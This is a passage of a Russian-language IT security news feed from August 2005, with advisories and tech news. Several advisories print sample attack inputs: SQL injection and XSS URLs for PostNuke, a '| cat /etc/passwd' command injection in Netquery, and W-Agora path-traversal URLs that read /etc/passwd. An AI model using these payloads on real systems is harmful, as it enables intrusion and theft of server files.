Злоумышленники могут прятать свои программы в Windows-ПК при помощи очень длинных ключей реестра, предупреждают секьюрити-эксперты. Эти ключи находятся в Windows Registry, важном компоненте операционной системы, где хранятся параметры настройки ПК. Некоторые антивирусные и антишпионские продукты сканирую реестр на наличие вредоносных программ, но эта новая уловка позволяет хакерам прятать такие программы, утверждает поставщик секьюрити-ПО StillSecure. «Ее можно использовать для сокрытия в системе вредоносных программ, которые не будут обнаруживаться инструментами защиты или средствами сканирования реестра», — предупреждает главный технолог StillSecure Митчелл Эшли. StillSecure утверждает, что обнаружение или устранение этих программ затруднено или даже невозможно. В четверг организация SANS Internet Storm Center, которая наблюдает за интернет-угрозами, привела перечень некоторых приложений, которые можно обмануть при помощи слишком длинных ключей. В него входят AdAware, Microsoft Windows AntiSpyware, HijackThis, Norton SystemWorks 2003 Pro, Microsoft Windows Registry Editor и WinDoctor. «Пользователям важно знать, есть ли белые пятна в безопасности их локальной системы, — пишет на веб-сайте SANS ISC сотрудник SANS Роберт Данфорд. — Поэтому в ближайшие недели нужно будет внимательно следить за обновлениями». Данфорд сотрудничает также с командой распространения секьюрити-предупреждений StillSecure. Особенно опасны так называемые ключи run реестра. Они используются для запуска приложений при загрузке Windows. Microsoft Registry Editor и некоторые популярные секьюрити-программы не обнаруживают слишком длинные ключи в Windows Registry, тем не менее приложения будут запускаться, предупреждает Эшли из StillSecure. «Авторам шпионского ПО будет очень легко спрятать в вашей машине слишком длинный ключ», — говорит он.
Первоисточник

29/08/2005 13:29 IBM обнародовала спецификации процессора Cell
Компания IBM обнародовала пакет спецификаций широко разрекламированного нового многоядерного процессора Cell, массовое применение которого, согласно прогнозам его создателей, может вызвать революционные изменения в компьютерной и бытовой технике. Разработка процессора ведется совместно компаниями IBM, Sony и Toshiba с 2001 года, принцип его действий основан на работе нескольких вычислительных "ядер" на одном кристалле, что позволяет добиться существенно более высокой производительности по сравнению с распространенными ныне современными одноядерными процессорными решениями. Планируется, что впервые Cell появится на массовом рынке в будущем году как компонент игровой приставки нового поколения Sony PlayStation 3. Впоследствии прогнозируется его применение в персональных компютерах и серверах, а также в другой электронной технике, в частности, в портативных устройствах, бытовых приборах и медицинском оборудовании. Разработчики выставляют на публичное обозрения спецификации еще не вышедшего продукта для того, чтобы программисты и создатели электронных устройств могли оценить перспективы использования возможностей Cell в своей работе. Вновь представленная документация доступна на сайте IBM, причем, вопреки ранее принятой практике, бесплатно.
Lenta.Ru

28/08/2005 15:59 Павел Ильин отпущен на свободу из зала суда
Скандально известный 29-летний литовский хакер Павел Ильин отпущен на свободу из зала Вильнюсского окружного суда в среду. Ильин обвинялся в попытке шантажа и вымогательства литовского коммерческого банка SEB Vilniaus bankas (он входит в шведскую банковскую группу SEB). В частности, Ильин распространил в Интернете заявление о том. что ему известны коды доступа к банковским счетам SEB Vilniaus bankas и предложил их всем желающим за несколько десятков тысяч литов. В июне 2003 г. 1-й участковый суд Вильнюса дал разрешение на арест хакера по подозрению во взломе информационных систем Vilniaus bankas. По утверждению директора департамента электронной коммерции SEB Vilniaus bankas Гедиминаса Валанчюса, банковские информационные системы являются "надежными", а возможности взломать их "нет никакой". По мнению Валанчюса, скорее всего, Ильин блефовал. 26 июня 2000 г. Ильин был задержан в Москве по подозрению в шпионаже в пользу Литвы и США. На следующий день было принято решение о его депортации в Литву без права последующего въезда на территорию России, поскольку Ильин не нанес вреда интересам России и а также с учетом его чистосердечного признания.
YTRO

28/08/2005 15:34 Доменная зона .EU начнет работу через месяц
В этом году Европейская комиссия после многолетних переговоров наконец достигла соглашения по введению общеевропейской доменной зоны .EU. Компании со всего континента теперь ждут начала так называемого Sunrise периода регистраций, который продлится четыре месяца, сообщает Ru-Center. В течение этого периода регистрация доменных имен в зоне .EU будет ограничена и разрешена только владельцам соответствующих товарных знаков и государственным организациям. Период Sunrise проводится при открытии новых доменных зон для того, чтобы предотвратить захват киберсквоттерами доменных имен, созвучных с товарными знаками. Представители ирландской компании IE Internet, которая является единственным аккредитованным в этой стране регистратором доменов .EU, заявили, что ими уже получены тысячи заявок на регистрацию еще до начала Sunrise периода. После периода предварительной регистрации в начале следующего года двери европейского интернет-пространства будут открыты для всех желающих по принципу "первый пришел - первый взял". Единственное ограничение для всех юридических лиц - географическое. Претенденту необходимо иметь офис или основное место ведения бизнеса на территории Евросоюза. Частное лицо должно быть резидентом ЕС. Администратором домена .EU является выбранный Еврокомиссией некоммерческий консорциум EURid, который имеет пять региональных представительств. Для регистрации домена в зоне .EU следует обращаться к одному из аккредитованных регистраторов, общее число которых достигает 200, а их офисы разбросаны по всей Европе. Работа регистраторов контролируется администрацией консорциума EURid. Новая доменная зона .EU не препятствует поддержанию компаниями их национального тождества, но делает серьезный шаг в битве Евросоюза с американским COM-господством.
Источник

28/08/2005 13:21 Интервью с Михалом Залевским
На сайте ONLamp.com, который поддерживается известной издательской компанией O’Reilly опубликовано довольно занятное и интересное интервью Federico Biancuzzi с известным польским исследователем компьютерной безопасности Михалом Залевским (Michal Zalewski). Михал прославился в мире информационной безопасности своими многочисленными исследованиями различного ПО, многие извстные уязвимости в "браузере всех времён и народов" IE были обнаружены как раз Михалом. Также является автором популярных утилит: p0f, memfetch, Fenris, fakebust. Недавно им была выпущена книга под названием "Silence on the Wire: A Field Guide to Passive Reconnaissance and Indirect Attacks" (издана O’Reilly в апреле 2005 г.). В интервью Михал делится своими взглыдами на компьютерную безопасность и высказывает много интересных мыслей.
Интервью

28/08/2005 12:40 Уязвимость в антивирусной библиотеке Sophos
Alex Wheeler из rem0te.com сообщает о наличии уязвимости в антивирусной библиотеке Sophos. Уязвимость связана с возможностью получения переполнения буфера в куче при обработке файлов Visio, что может позволить удалённому атакующему получить полный контроль над защищаемой системой. При этом не требуется каких-либо действий со стороны пользователя системы. Атака может быть произведена с использованием протоколов SMTP, SMB, HTTP, FTP и т.д. Список уязвимых продуктов довольно велик, так как помимо собственного ПО, выпускаемого Sophos, библиотека используется ещё в продуктах OEM-партнёров Sophos. Автором выпущен PDF-документ, описывающий уязвимость более детально
Описание

27/08/2005 18:52 Первый приговор за незаконное распространение телефонной базы данных
Ленинским районным судом Екатеринбурга вынесен приговор 27-летнему гражданину, пытавшемуся продать незаконно полученную базу данных, включающую номера телефонов и фамилии абонентов стационарной связи ОАО «Уралсвязьинформ», проживающих на Среднем Урале. Это первый подобный приговор, вынесенный на территории Свердловской области. Адвокат подсудимого обжаловал приговор в вышестоящей инстанции, однако Судебная коллегия по уголовным делам Свердловского областного суда не удовлетворила кассационную жалобу. В настоящее время приговор уже вступил в законную силу. 27-летний гражданин Ахметов был привлечен к уголовной ответственности по двум статьям Уголовного кодекса – ст. 272 (неправомерный доступ к компьютерной информации), а также ст. 146 (нарушение авторских и смежных прав). Вторая статья инкриминировалась подсудимому за другой эпизод – попытку продажи незаконно полученной базы «Скайнет». В ходе судебного разбирательства вина Ахметова была полностью доказана. Суд определил подсудимому наказание в виде штрафа в размере 30000 рублей. Кроме того, согласно приговору, осужденный обязан возместить фирме – держателю авторских прав на базу «Скайнет» сумму ущерба в размере 70000 рублей.
ОАО "Уралсвязьинформ"

27/08/2005 14:38 10 лет браузеру Internet Explorer
Этот браузер был выпущен десять лет назад, 24 августа 1995 г, сообщает Вебпланета. Однако никто не обратил абсолютно никакого внимания на маленькую программку Internet Explorer 1.0.
Internet Explorer 1.0 был частью Microsoft Internet Jumpstart Kit в комплекте утилит Microsoft Plus!, расширяющих функциональность Windows 95. Три месяца спустя в этом же комплекте появилась доработанная версия Internet Explorer 2.0 — первый кросс-платформенный браузер, который работал как под Macintosh, так и под 32-битной Windows. Во второй версии разработчики реализовали поддержку SSL, cookies и VRML. В августе 1996 г. была выпущен полностью переделанный IE3, который мог самостоятельно отображать графику и впервые для браузеров поддерживал CSS. В четвертой версии (октябрь 1997 г.) появилась поддержка DHTML и новая программа для обработки почты — Outlook. Наступала эпоха Internet Explorer. В те годы безусловным лидером среди подобных программ был браузер Netscape, и Microsoft поставила своей целью догнать фаворита. За несколько лет (1995–1997) была проделана очень большая работа, которая на самом деле принесла пользу интернет-сообществу и привела, в конце концов, к рождению свободных браузеров с открытым исходным кодом. Те, кто десять лет назад создавал сайты под браузер Netscape, должен помнить, насколько убогим (по современным меркам) это был браузер. Когда был выпущен Internet Explorer 4.0, то даже не стояло вопроса, какой браузер лучше. Количество изменений в браузере Microsoft было просто ошеломляющим, и он был тесно интегрирован в Windows 98, поэтому IE удалось довольно быстро захватить рынок. В дальнейшем развитие шло по нарастающей: IE5 (поддержка XML и XSL) и IE6 только упрочили лидерство.
Подробнее

27/08/2005 13:32 Аресты мобильников: истерия начинается заново?
24 августа МВД изъяло вторую партию контрабандных телефонов, правда, не столь крупную, как первая. Впрочем, на рынке это скажется все равно: цены на телефоны могут возрасти еще на 10-15%, говорят опрошенные дилеры. В целом же, продолжение победоносной "акции по аресту мобильников" было достаточно неожиданным: высказываются мнения, что те перемены, которые произошли, были только началом грандиозного передела. Еще одна партия телефонов — общим весом 55 тонн, состоящая из около 200 тыс. трубок, — была задержана 24 августа в грузовом терминале аэропорта Шереметьево. Руководил операцией Следственный комитет при МВД РФ. Как сообщили РБК в комитете, телефоны предназначались для продажи в салонах сотовой связи на территории России. Операция проводилась в рамках уголовного дела, возбужденного по факту контрабанды. Кто на самом деле стоит за переменами, внезапно свалившимися на российский рынок ритейла телефонов, остается только догадываться. Очевидно лишь одно: к своему прежнему состоянию рынок уже не вернется. Опрошенные CNews участники рынка в целом говорят, что продолжение акции МВД стало для них полной неожиданностью. В одной из розничных сетей корреспонденту CNews рассказали, что в ближайшее время цены на мобильные телефоны могут повыситься на 10–15%.
Более подробно

27/08/2005 11:16 Правительство Великобритании заметило Firefox
Софтверная компания Autodesk тоже решила, наконец, сделать один из своих продуктов Firefox-совместимым, так что дни веб-сайтов только для IE, похоже, сочтены. Министерство трудоустройства и пенсионного обеспечения Великобритании (DWP) решило сделать свои веб-сайты совместимыми с максимальным количеством браузеров, включая популярный браузер open source Firefox. «Мы очень озабочены расширением спектра браузеров, используемых нашими заказчиками, таких как Firefox и Opera, — сказал в среду начальник отдела электронных коммуникаций DWP Карл Мосон. — Мы намерены решить эту проблему, так чтобы веб-сайты работали с максимальным числом браузеров и на максимально возможном количестве платформ». В настоящее время инструменты поиска работы на веб-сайте Jobcentreplus с этим браузером использовать нельзя, так как списки групп, типов и наименований вакансий при открытии страницы поиска не заполняются. DWP — не единственная организация, озаботившаяся поддержкой Firefox. Софтверная компания Autodesk сообщила, что она работает над поддержкой Firefox для продукта MapGuide, который позволяет компаниям распространять приложения геоинформационных систем через Web. Похоже, что политика Autodesk меняется. В начале этого месяца читатель ZDNet UK жаловался, что Autodesk отказывается поддерживать отличные от IE браузеры.
ZDNet

27/08/2005 10:10 США подозревают власти Китая в спонсировании хакеров
Власти США полагают, что за многочисленными хакерскими атаками на публичные сайты государственных органов этой страны могут стоять агенты китайских спецслужб. Об этом на условиях анонимности сообщили компании CNN источники в американском правительстве. По их словам, выяснением этого вопроса в настоящее время занимаются ФБР и Пентагон. Источники заявляют, что попытки взлома несекретных сайтов различных государственных органов США фиксируются регулярно. Некоторые из них оказываются успешными, что выводит сайты из строя - периодически хакеры заменяют их главные страницы на антиамериканские тексты. Спецслужбы США допускают, что хакеры могут таким образом выполнять задания официального китайского руководства, в связи с чем и производится поиск доказательств. Представители ФБР эту информацию комментировать отказались, сославшись на "чувствительность" данного вопроса.
CNN

26/08/2005 17:11 Отказ от обслуживания в Apache 2.0.x
Филип Снипп (Filip Sneppe) обнаружил уязвимость в популярном веб-сервере Apache 2.0.x. Уязвимость заключается в израсходовании всей выделенной виртуальной памяти и своп-файла в результате HTTP запроса с большим значением границы пересылаемого сегмента данных (byterange), при обращение злоумышленника к CGI скрипту, что приводит к "отказу от обслуживания" процесса веб-сервера. Уязвимость отсутствует в Apache 2.0(и предыдущих версиях), а также в следующих версиях после 2.0.54-r9.
ASF Bugzilla

26/08/2005 15:57 Опасная уязвимость в Simple PHP Blog
Обнаружена опасная узвимость в PHP-системе введения "блогов" - Simple PHP Blog 0.4.0(и возможно предыдущих версиях). Уязвимость обнаружена в модуле "upload_img_cgi.php", допускающего загрузку файлов без проверки их расширения, в том числе и php-файлов, что позволит злоумышленнику выполнить на сервере произвольный php код.
Secunia

26/08/2005 14:34 Иллюстрированное руководство по IPSec
Stephen J Friedl - специалист по компьютерной безопасности из Tustin (Калифорния) опубликовал иллюстрированное руководство, посвящённое описанию семейству протоколов IPSec, предназначенных для построения безопасных компьютерных сетей. Как пишет сам автор в анонсе, механизм обмена ключами (Key Exchange) будет им рассмотрен в другой статье.
Руководство

26/08/2005 14:15 Эксплоит уязвимости Internet Explorer
Опубликован эксполит уязвимости, обнаруженной в библиотеке MS Internet Explorer - Msdds.dll (CLSID = 'EC444CB6-3E7E-4865-B1C3-0DE72EF39B3F'). Код преставляет собой perl-скрипт, который позволяет создать HTML-страницу, при обращение к которой, используя браузер на уязвимой системе открывается 28876 порт.
Эксплоит

26/08/2005 13:54 В продуктах Symantec обнаружена уязвимость
iDefense Labs обнаружили уязвимость в продуктах Symantec, которая позволяет локальному пользователю повысить свои привилегии на системе. Уязвимость существует в HELP-функции, которая использует HTML-интерфейс с помощью Windows. Непривилегированный локальный пользователь может получить доступ на чтение и выполнение файлов с привилегиями Local System. Уязвимы Symantec AntiVirus Corporate Edition 9.0, 9.0.1, 9.0.2; Symantec Client Security 2.0, 2.0.1, 2.0.2. Для решения проблемы необходимо установить обновление с сайта производителя
Symantec

26/08/2005 13:41 Microsoft начнет борьбу с фишингом еще до выпуска IE7
Microsoft не станет дожидаться выпуска Explorer 7 (IE7), чтобы дополнить свой браузер фильтром против фишинга, действующим через панель инструментов MSN. В среду компания объявила, что предварительная версия функции, широко обсуждавшейся в контексте выпуска IE 7 в будущем году, выйдет в ближайшие недели. Представитель Microsoft сообщил ZDNet UK, что компания «скоро усилит защиту заказчиков, предложив бета-версию Microsoft Phishing Filter для MSN Search Toolbar, а затем и для других инструментов». Фильтр, предназначенный для выявления и блокирования злонамеренных веб-сайтов, пытающихся обманным путем выведать у пользователей информацию о банковских счетах и другие персональные данные, войдет и в состав IE 7. Представитель Microsoft заявил, что это «не означает изменений стратегии» компании и что «мы начали говорить о возможности выпуска Microsoft Phishing Filter для MSN Tool Bar только на этой неделе». Он добавил, что Microsoft планирует выпустить «множество технологий, помогающих предотвратить попытки фишинга по e-mail и на уровне браузера».
ZDNet

26/08/2005 13:04 Опасная уязвимость в Simpleproxy
Ульф Ханхамар (Ulf Harnhammar) сообщил об обнаружение опасной уязвимости в HTTP прокси-сервере Simpleproxy 3.x, которая позволяет злоумышленнику с помощью измененного HTTP-запроса вызвать ошибку обработки на стороне сервера и выполнить произвольный программный код. Уязвимость устранена в Simpleproxy 3.4.
Secunia

26/08/2005 12:49 В Бразилии арестованы 85 хакеров
Бразильская полиция устроила настоящую облаву на компьютерных преступников. По данным властей, в минувший четверг полиция арестовала 85 человек, которые украли в общей сложности 33 млн. долларов, путем взлома онлайновых банковских аккаунтов. В операции участвовал 41 офицер полиции, облава произошла одновременно в 7 штатах. Это крупнейшая акция против компьютерных преступников в Бразилии. Исследование показало, что хоть в Бразилии не так много интернет-пользователей, но те, кто все-таки пользуются Сетью, подвергаются серьезной угрозе со стороны хакеров. Особенно осторожным приходится быть тем, кто пользуется услугой онлайнового банкинга. Бразилия становится настоящим рассадником хакеров. По данным второго квартала, за год преступность выросла на 1300 процентов, с 562 происшествия в прошлом году, до 7942 происшествий в нынешнем.
Вебпланета

25/08/2005 16:06 Новый ресурс по трудоустройству студентов
Проект ориентирован на ту категорию молодежи, которая заканчивает получение высшего образования или только находится в процессе его получения. На сайте можно разместить собственное резюме с помощью "Мастера резюме", которое попадет в базу данных веб-сайта, "а оттуда – напрямую в крупные российские и зарубежные компании". Аккаунт с резюме получает постоянный адрес вида "http://www.student-jobs.ru/ваше_имя/". Владельцы ресурса обещают свою помощь - несколько способов поиска работы, подсказки для подготовки к собеседованию и успешного прохождения испытательного срока. Здесь можно найти советы о том, как совместить работу с учебой, и как ответить на "каверзные" вопросы работодателей, как "выжить" на новой работе, зарекомендовав себя лучшим способом. На сайте представлена информация о получении дополнительного образования, о программе MBA, о различных курсах и тренингах.
Student-Jobs.ru

25/08/2005 15:55 Уязвимость в FTP-сервере Home FTP Server
Донато Ферранте(Donato Ferrante) обнаружил уязвимость в FTP-сервере Home FTP Server 1.0.7 (build 45) и возможно прошлых версиях. Уязвимость заключается в возможности получения любого файла вне домашнего каталога, используя относительные пути "../../".
Эксплоит

25/08/2005 15:43 Множественные уязвимости в PostNuke
Обнаружен ряд уязвимостей в системе управления контентом веб-сайта PostNuke 0.760-RC4b. Обнаруженные уязвимости позволяют злоумышленнику выполнить произвольный SQL апрос и произвести межсайтовый скриптинг(XSS атаку).
1) Уязвимость обнаружена в модуле "modules/Downloads/dl-viewdownload.php", в параметре входных данных "show". Пример использования уязвимости:
"http://[HOST]/[DIR]/index.php?name=Downloads&req=viewdownload&cid=1&show=[SQL%20INJECTION]"
Уязвимость отмечена как не критическая, т.к. для получения доступа к этому модулю необходимо иметь права администратора системы.
2) XSS атака связана со слабой проверкой входных данных переменной "moderate" в файле "index.php":
"http://[HOST]/[DIR]/index.php?module=Comments&req=moderate&moderate=<center><h1>xss"
и переменной "htmltext" в файле "user.php":
"http://[HOST]/[DIR]/user.php?op=edituser&htmltext=<h1>xss".
Описание

24/08/2005 19:05 Переполнение буфера в mplayer
Свен Тантау(Sven Tantau) сообщил об обнаружение уязвимости в мультимедийном плеере mplayer 1.0_pre7/1.0_pre6-r4/1.0pre6-3.3.5-20050130 для Linux платформ. Уязвимость заключается в возможности переполнения буфера при разборе заголовка аудио потока видео-файла, а именно некорректной обработке больших значений параметра "strf". Используя обнаруженную уязвимость злоумышленник может выполнить произвольный программный код в контексте приложения.
Подробнее

24/08/2005 18:32 Телефонные коды Москвы и еще 18-ти регионов будут изменены
Телефонные географические коды Москвы и еще 18-ти регионов будут изменены с 1 декабря 2005 г. Это изменение будет произведено согласно приказу Мининформсвязи от 3 августа 2005 г N 95 "Об изменении закрепления кодов географически определяемых зон нумерации и кодов географически неопределяемых зон нумерации", сообщил сегодня на пресс-конференции руководитель департамента Мининформсвязи Виталий Слизень. В соответствии с данным приказом, телефонный географический код Москвы /код АВС/ будет изменен с 095 на 495, код Московской области будет изменен с 096 на 496. Будет произведено также изменение кодов некоторых других областей:
Белгородской - с 072 на 472
Брянской - с 083 на 483
Владимирской - с 092 на 492
Воронежской - с 073 на 473
Ивановской - с 093 на 493
Калининградской - с 011 на 411
Калужской - с 084 на 484
Костромской - с 094 на 494
Курской - с 071 на 471
Липецкой - с 074 на 474
Орловской - с 086 на 486
Рязанской - с 091 на 491
Смоленской - с 081 на 481
Тамбовской - с 075 на 475
Тверской - с 082 на 482
Тульской - с 087 - на 487
Ярославской - с 085 на 485.
Кроме этого, нумерация сетей операторов фиксированной связи, работающих в негеографическом коде 097, переводится в коды соответствующих географических зон субъектов РФ. С 1 декабря 2005 г по 31 января 2006 г будут действовать оба кода – старый и новый. По словам В. Слизеня, эти меры предприняты в связи с планируемым изменением порядка выхода абонентов на междугородную и международную связь: вместо используемого сейчас для этой цели префикса "8" в перспективе будет использоваться префикс "0" для выхода на междугородную связь и "00" для выхода на международную связь. Этот переход должен быть осуществлен до конца 2006 г. Вследствие этого формат "федеральных" сотовых номеров также изменится с 8-код-ХХХ-ХХХХ на 0-код-ХХХ-ХХХХ.
Прайм-Тасс

24/08/2005 10:00 MSN Messenger Plus! - это вирус или spyware
Мы уже сообщали о том, что расширение MSN Messenger Plus! интернет-пейджера MSN Messenger от компании Microsoft определялось программой Microsoft Anti-Spyware как spyware("шпионское ПО"). Вчера на официальном сайте программы MSN Messenger Plus! было заявлено, что определение файла "msgplus.exe" программы MSN Messenger Plus! 3.60 Beta как вирус под названием Backdoor.Tixanbot является ошибочным и никакого вредоносного кода программа MSN Messenger Plus! не содержит. Кроме этого, разработчики заявили, что к финальному релизу MSN Messenger Plus! 3.60, который состоится в сентябре все проблемы будут улажены, способы устранения проблем уточнены не были. Возможно в разработчики MSN Messenger Plus! и правы в своем утверждение, однако такие совпадения наталкивают на соответствующие выводы.
MSN Messenger Plus!

24/08/2005 08:58 Google на рынке интернет-пейджеров
Сегодня компания Google анонсировала выход своего собственного интернет-пейджера Google Talk, открытие нового сервиса было очевидно, т.к. конкурирующии компании, такие как MSN, Yahoo и AOL давно имеют подобные средства коммуникации. Google Talk использует для своей работы, не новый и ставший известным протокол Jabber. Поддержка этого протокола уже реализована в ряде универсальных интернет-пейджеров, таких как Trillian, GAIM, iChat, Psi и прочих. Для пользователей, которые предпочитают использовать специализированные интернет-пейджеры, компания Google выпустила утилиту доступную для скачивания на веб-сайте Google Talk. Для использования нового сервиса необходимо иметь регистрацию на почтовом сервисе GMail компании Google, т.к. именно это сочетание логин/пароль используется для авторизации. Стоит отметить, что кроме стандартного обмена мгновенными сообщениями Google Talk предлагает услугу голосового общения VoIP подобную Skype.
Google Talk

24/08/2005 02:32 Уязвимость в Ventrilo
Обнаружена уязвимость в программе голосового общения через Интернет/локальную сеть Ventrilo 2.1.2-2.3.0, для различных платформ. Уязвимость заключается в возможности атакующему вызвать "отказ от обслуживания" службы, путем посылки специально сформированного сообщения статуса на UDP порт 3784. Сообщение статуса соответствует команде 1, содержащей 16 байт заголовка сообщения, отсутствие этого заголовка вызывает "отказ от обслуживания".
Эксплоит

24/08/2005 02:16 Получение пароля от Mercora IMRadio
Программа Mercora IMRadio 4.0.0.0(и прошлые версии) хранит пароль и имя пользователя в открытом виде в системном реестре:
"HKEY_CURRENT_USERSoftwareMercoraMercoraClientProfiles
Auto.Username = Mercora IMRadio Username
Auto.Password = Mercora IMRadio Password"
Эксплоит

23/08/2005 19:54 Опасная узвимость в Netquery 3.11
Обнаружена опасная уязвимость в наборе сетевых утилит Netquery 3.11(возможно и в прошлых версиях), которая позволяет злоумышленнику выполнить произвольные команды на сервере и получить содержимое любого файла. Уязвимость обнаружена в модуле "PING", для использования ее необходимо в поле ввода "Ping IP Address or Host Name" ввести команду, поставив перед ней "|", например: "| cat /etc/passwd". Уязвимой система является при отключенном в настройках PHP параметре "magic_quotes_gpc".
Эксплоит

23/08/2005 19:35 Скрытие информации в файлах DevC++
Обнаруженная уязвимость позволяет скрыть некоторые данные в файлах, открываемых в интегрированной среде разработки DevC++ v.4.9.9.2. Для использования этой уязвимости необходимо вставить нулевой байт(%00) перед строкой которую надо скрыть, строка не будет отображаться в редакторе, но будет при этом выполняться при компиляции, что может привести к различного рода последсвиям.
Пример

23/08/2005 14:10 Microsoft Anti-Spyware превзошел все ожидания разработчиков
Программа Microsoft Anti-Spyware - достаточно новая разработка компании Microsoft, предназначенная для борьбы с различными adware и spyware программами. Недавно эта программа стала обнаруживать в другом популярном программном продукте MSN Messenger Plus!, которое является расширением для MSN Messenger от Microsoft алгоритм схожий с тем, что применяется в "шпионском ПО". Алгоритм был обнаружен в исполняемом файле "msgplus.exe", а по сообщению Microsoft Anti-Spyware является опасным adware (C2 Lop) и подлежит удалению. Разработчики MSN Messenger Plus!, заявили, что никаких spyware или adware этот файл не содержит, а происшедшее - это случайное недоразумение причиной которого стали недоработки в программе Microsoft Anti-Spyware.
Neowin

23/08/2005 12:33 Множественные уязвимости в PHPFreeNews
В новостной системе PHPFreeNews 1.4.0 (и предыдуших версиях) обнаружено несколько уязвимостей, позволяющих злоумышленнику выполнить произвольный SQL запрос и произвести межсайтовый скриптинг(XSS).
1) Недостаточная проверка входных параметров "Match" и "CatID" в модуле "SearchResults.php" позволяет злоумышленнику выполнить произвольный SQL запрос.
2) Недостаточная проверка параметров "NewsMode" и "Match" в модуле "SearchResults.php" и "NewsCategoryForm.php" позволяет выполнить произвольный HTML код или скрипт на компьютере пользователя, просматривающего страницу с определенным адресом.
SecuriTeam

23/08/2005 12:14 ВВС США неспособны противостоять хакерам
По сообщению The Sydney Morning Herald, в июне этого года на авиабазе Рэндолф, расположенной в 32 км от г. Сан-Антонио, штат Техас, США, была обнаружена странная активность одного из пользователей базы данных, в которой находятся имена и фамилии офицеров, их послужной список, звания, даты рождений и номера социального обеспечения. После выяснения причин активности, было выявлено незаконное подключение к базе данных, с помощью которого злоумышленник похител информация о более чем 33000 офицерах военно-воздушных сил США. При доступе к базе данных использовался реально существующий аккаунт, в министерстве обороны США выясняют причины утечки информации о доступе к базе и обещают принять все необходимые меры по поимке вора.
uinC

22/08/2005 19:52 Установки "по-умолчанию" в MS Windows Vista поставили под угрозу безопасность системы
После обнаружения несанкционированной сетевой активности в ОС Windows Vista Beta 1, некоторые бета-тестеры обратились за помощью к SANS Internet Storm Center. В SANS предположили, что сетевая активность вызвана неизвестным типом сетевой атаки, но проанализировав ситуации пришли к выводу, что причинной расхода трафика стала активность системной службы, обменивающееся с другими компьютерами через "Peer Name Resolution Protocol (PNRP)", как только ОС обнаружит подключение к Интернет или другую сетевую активность. Активность этой службы "по-умолчанию", после установки ОС, вызвала ряд недовольств со стороны бета-тестеров, они утвеждают, что эта служба подвергает риску их сетевую безопасность. Менеджер компании Microsoft, Грег Саливан (Greg Sullivan) прокомментировал сложившуюся ситуацию следующим образом: "... Мы выпускаем бета-версии своих продуктов, прежде всего для того, чтобы выяснить работоспособность отдельных элементов этих продуктов... включение в них некоторых функций "по-умолчанию" позволяет более детальней выяснить их функционирование... Ведь это всего лишь бета-версии и поэтому мы используем для этого бета-тестеров... В этом нет ничего удивительного...". По заявлению компании Microsoft она не отказывается от своего принципа "secure by design, secure by default and secure in deployment", и поэтому в финальной версии ОС Windows Vista данная служба будет отключена для обеспечения большей безопасности компьютерной системы. Напомним, что тестирование работы протокола PNRP началось еще с операционной системы Windows XP SP1, тогда независимые сетевые аналитики признали его достаточно защищенным.
News.com.com

21/08/2005 17:38 Уязвимость в Process Explorer
В утилите Process Explorer компании Sysinternals обнаружена уязвимость. Уязвимость заключается в обработке длинных имен параметра "CompanyName", что позволяет злоумышленнику произвести переполнение буфера программы и выполнить произвольный программный код с правами запущенного приложения.
Эксплоит

21/08/2005 17:30 Переполнение буфера в WinACE
В архиваторе WinACE 2.6.0.5 обнаружена уязвимость при обработке длинных имен, создаваемых перед архивацией, временных файлов. В результате использования этой узвимости злоумышленник может выполнить произвольный программный код с правами текущего пользователя.
Эксплоит

20/08/2005 11:29 После ареста юный "хакер" сдал заказчика
Семнадцатилетний "хакер" Джэсмин Синх (Jasmine Singh) из Нью-Джерси использовал компьютерный вирус, чтобы создать сеть из нескольких тысяч так называемых компьютеров-зомби и произвести DoS атаку по намеченным жертвам - интернет-магазинам, занимающихся продажей спортивной одежды, Jersey-Joe.com и Distant Replays.
Распространяя вирус юный "хакер" оставил много следов, в том числе и электронный адрес своего личного почтового ящика, с помощью которого полиции удалось выяснить его имя и даже домашний адрес, так как все злодеяния производились с домашнего компьютера.
Подросток признал свою вину и заявил, что причиной его действий стала просьба восемнадцатилетнего знакомого, по имени Джейсон Арабо, который занимался продажей спортивной одежды через Интернет. За устранение конкурентов Джейсон Арабо обещал вознаградить юного "хакера" тремя парами кроссовок и спортивными часами.
Первоначально Синху были предъявлены два обвинения первой степени, грозящие сроком заключения до 20 лет каждое. Затем они были заменены обвинениями второй степени, в результате чего и был вынесен относительно несуровый приговор, 5 лет лишения свободы. Также хакеру предстоит выплатить пострадавшим фирмам компенсацию в размере $35 тыс.
CNews

20/08/2005 05:10 Множественные уязвимости в OpenVPN
Обнаружено несколько уязвимостей в OpenVPN 1.x/2.x, результатом использования которых может стать "отказ от обслуживания"(DoS атака).
1) Ошибка связанная с обработкой очереди OpenSSL при аутентификации пользователя с неправильным сертификатом. Для удачной эксплуатации этой ошибки, OpenVPN должен быть запущен с "verb 0" и без "tls-auth";
2) Ошибка в обработке OpenSSL позволяет специально сформированным пакетом вызвать ошибку в распаковке зашифрованного пакета данных;
3) Авторизированный клиент в режиме "dev tap" может послать неограниченное число пакетов данных, с подделанными MAC адресами, до заполнения системной памяти;
4) Два или более клиентов подключенных к серверу с одним и тем же сертификатом могут вызвать исключительную ситуацию. Для использования этой уязвимости на сервере должна буть отключена опция "duplicate-cn".
Уязвимости ликвидированы в OpenVPN 2.0.1, доступной на сайте производителя.
OpenVPN

19/08/2005 13:58 Надежность SHA-1 под угрозой
Известный специалист в области криптографии, Брюс Шнайер(Bruce Schneier), опубликовал в своем блоге данные о новых достижениях китайских исследователей, сумевших добиться появления коллизий в хэш функции SHA-1 при выполнении порядка 2^63 операций и судя по всему это далеко не предел. Предыдущий результат был 2^69, при простом переборе требуется порядка 2^80 операций.
Подробнее
Источник

19/08/2005 13:45 Выпуск универсального контроллера от System Talks
Японская фирма System Talks объявила о выпуске новой своей разработки SGC-52UFG2 из серии "все в одном". Новая разработка компании представляет собой универсальный PCI контроллер, для различного вида устройств. На этой PCI плате расположены следующии виды портов: 1 порт RJ-45 Ethernet(1000, 100, 10 Base-T), 2 порта USB 2.0, 1 порт FireWire и 1 порт iLink, кроме этого имеются внутреннии коннекторы и возможность подключения дополнительной, поставляемой в комплекте "планки" с 2 портами USB 2.0 и 1 портом IEEE1394. SGC-52UFG2 уже поступила в продажу на территории Японии, ее цена составляет около $60.
System Talks

18/08/2005 21:17 Уязвимость в форуме W-Agora 4.2
Обнаружена опасная уязвимость в "движке" форума W-Agora 4.2, позволяющая злоумышленнику получить произвольный файл с веб-сервера. Уязвимость заключается в недостаточной проверке относительных путей передаваемых скрипту в параметре "site". Примеры URL запросов, использующих эту уязвимость с целью получения файлов сервера:
"http://www.example.com/w-agora/index.php?site=../../../../../../../../etc/passwd%00
http://www.example.com/w-agora/index.php?site=../../../../../../../../etc/passwd
